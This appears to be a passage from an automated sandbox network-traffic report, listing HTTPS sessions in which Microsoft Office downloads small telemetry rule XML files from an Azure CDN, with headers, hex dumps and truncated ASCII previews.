                                            2024-11-18 20:16:42 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            58192.168.2.44980713.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:42 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:42 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:42 GMT
                                            Content-Type: text/xml
                                            Content-Length: 472
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                            ETag: "0x8DC582B9D43097E"
                                            x-ms-request-id: dd4d8867-801e-0083-7a9b-38f0ae000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201642Z-16547b76f7f6nr89hC1DFWz7ug00000002qg000000001y8u
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:42 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            59192.168.2.44980413.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:42 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:42 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:42 GMT
                                            Content-Type: text/xml
                                            Content-Length: 419
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                            ETag: "0x8DC582BB32BB5CB"
                                            x-ms-request-id: 30aa96c6-b01e-0070-529f-371cc0000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201642Z-164f84587bfr8hdmhC1DFWt5nc00000004gg00000000g8re
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:42 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            60192.168.2.44981313.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:43 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:43 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:43 GMT
                                            Content-Type: text/xml
                                            Content-Length: 404
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                            ETag: "0x8DC582B95C61A3C"
                                            x-ms-request-id: 140e2611-e01e-003c-3f87-36c70b000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201643Z-164f84587bfr8hdmhC1DFWt5nc00000004fg00000000nnuf
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:43 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            61192.168.2.44981113.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:43 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:43 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:43 GMT
                                            Content-Type: text/xml
                                            Content-Length: 478
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                            ETag: "0x8DC582B9B233827"
                                            x-ms-request-id: 7a7e882b-d01e-002b-49aa-3625fb000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201643Z-16547b76f7fjx5nrhC1DFW4dsc00000003g000000000ahr5
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:43 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            62192.168.2.44981013.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:43 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:43 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:43 GMT
                                            Content-Type: text/xml
                                            Content-Length: 486
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                            ETag: "0x8DC582B92FCB436"
                                            x-ms-request-id: a9c4265b-101e-000b-57af-365e5c000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201643Z-16547b76f7fw2955hC1DFWsptc00000006pg00000000y9pn
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:43 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            63192.168.2.44981213.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:43 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:43 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:43 GMT
                                            Content-Type: text/xml
                                            Content-Length: 423
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                            ETag: "0x8DC582BB7564CE8"
                                            x-ms-request-id: fdac4f62-e01e-0085-71ab-36c311000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201643Z-16547b76f7fbkfmzhC1DFWm9tw00000005wg00000000ma8z
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:43 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            64192.168.2.44981413.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:43 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:43 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:43 GMT
                                            Content-Type: text/xml
                                            Content-Length: 468
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                            ETag: "0x8DC582BB046B576"
                                            x-ms-request-id: 0304051c-b01e-0070-43af-361cc0000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201643Z-1866b5c5fbbzzh8chC1DFWzc5c00000000fg00000000eb5g
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:43 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            65192.168.2.44981613.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:44 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:44 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:44 GMT
                                            Content-Type: text/xml
                                            Content-Length: 479
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                            ETag: "0x8DC582BB7D702D0"
                                            x-ms-request-id: 316038b9-a01e-006f-2591-3713cd000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201644Z-16547b76f7fljddfhC1DFWeqbs000000075g000000007z2q
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:44 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            66192.168.2.44981513.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:44 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:44 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:44 GMT
                                            Content-Type: text/xml
                                            Content-Length: 400
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                            ETag: "0x8DC582BB2D62837"
                                            x-ms-request-id: 7b112b71-901e-005b-73c6-372005000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201644Z-16547b76f7fd77jrhC1DFWfwq0000000030g0000000090ua
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:44 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            67192.168.2.44981813.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:44 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:44 UTC470INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:44 GMT
                                            Content-Type: text/xml
                                            Content-Length: 475
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                            ETag: "0x8DC582BB2BE84FD"
                                            x-ms-request-id: 373f0e0b-901e-008f-80b0-3767a6000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201644Z-1866b5c5fbblmqrkhC1DFWf9ns00000004gg0000000013e9
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
                                            2024-11-18 20:16:44 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            68192.168.2.44981713.107.246.45443
                                            TimestampBytes transferredDirectionData
                                            2024-11-18 20:16:44 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept-Encoding: gzip
                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                            Host: otelrules.azureedge.net
                                            2024-11-18 20:16:44 UTC491INHTTP/1.1 200 OK
                                            Date: Mon, 18 Nov 2024 20:16:44 GMT
                                            Content-Type: text/xml
                                            Content-Length: 425
                                            Connection: close
                                            Cache-Control: public, max-age=604800, immutable
                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                            ETag: "0x8DC582BBA25094F"
                                            x-ms-request-id: de79bc98-401e-0064-1e9b-3754af000000
                                            x-ms-version: 2018-03-28
                                            x-azure-ref: 20241118T201644Z-16547b76f7fr5rfnhC1DFW0am400000003r000000000nfxa
                                            x-fd-int-roxy-purgeid: 0
                                            X-Cache-Info: L1_T2
                                            X-Cache: TCP_HIT
                                            Accept-Ranges: bytes
